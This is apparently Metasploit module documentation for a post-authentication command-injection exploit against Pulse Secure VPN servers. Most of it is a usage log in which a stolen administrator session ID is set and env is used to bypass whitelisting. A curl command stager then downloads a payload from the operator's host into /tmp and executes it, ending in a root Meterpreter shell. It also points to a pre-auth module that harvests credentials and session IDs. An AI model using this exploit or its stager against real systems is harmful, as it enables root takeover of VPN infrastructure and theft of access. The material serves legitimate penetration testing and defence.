## Introduction This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The env(1) command is used to bypass application whitelisting and run arbitrary commands. Please see related module `auxiliary/gather/pulse_secure_file_disclosure` for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. A valid administrator session ID is required in lieu of untested SSRF. ## Targets ``` Id Name -- ---- 0 Unix In-Memory 1 Linux Dropper ``` ## Options **SID** Set this to a valid administrator session ID. Typically retrieved using the `auxiliary/gather/pulse_secure_file_disclosure` module. ## Usage ``` msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857 sid => 676f5f892e8c4a6419f10564f9e9d857 msf5 exploit(linux/http/pulse_secure_cmd_exec) > run [*] Started reverse TCP handler on 127.0.0.1:[redacted] [+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857 [*] Obtaining CSRF token [+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5 [*] Executing Linux Dropper target [*] Using URL: https://0.0.0.0:[redacted]/HSEjp77 [*] Local IP: https://[redacted]:[redacted]/HSEjp77 [*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"] [*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77 [*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi [*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi [*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77 [*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) [+] Payload execution successful [*] Command Stager progress - 63.96% done (71/111 bytes) [*] Executing command: env chmod +x /tmp/qlUqDxCU [*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi [*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi [+] Payload execution successful [*] Command Stager progress - 87.39% done (97/111 bytes) [*] Executing command: env /tmp/qlUqDxCU [*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi [*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi [*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600 [!] Payload execution may have failed [*] Command Stager progress - 102.70% done (114/111 bytes) [*] Executing command: env rm -f /tmp/qlUqDxCU [*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi [*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi [+] Payload execution successful [*] Command Stager progress - 123.42% done (137/111 bytes) [*] Server stopped. meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > sysinfo Computer : [redacted] OS : (Linux 2.6.32-00486-gddd7e32-dirty) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ```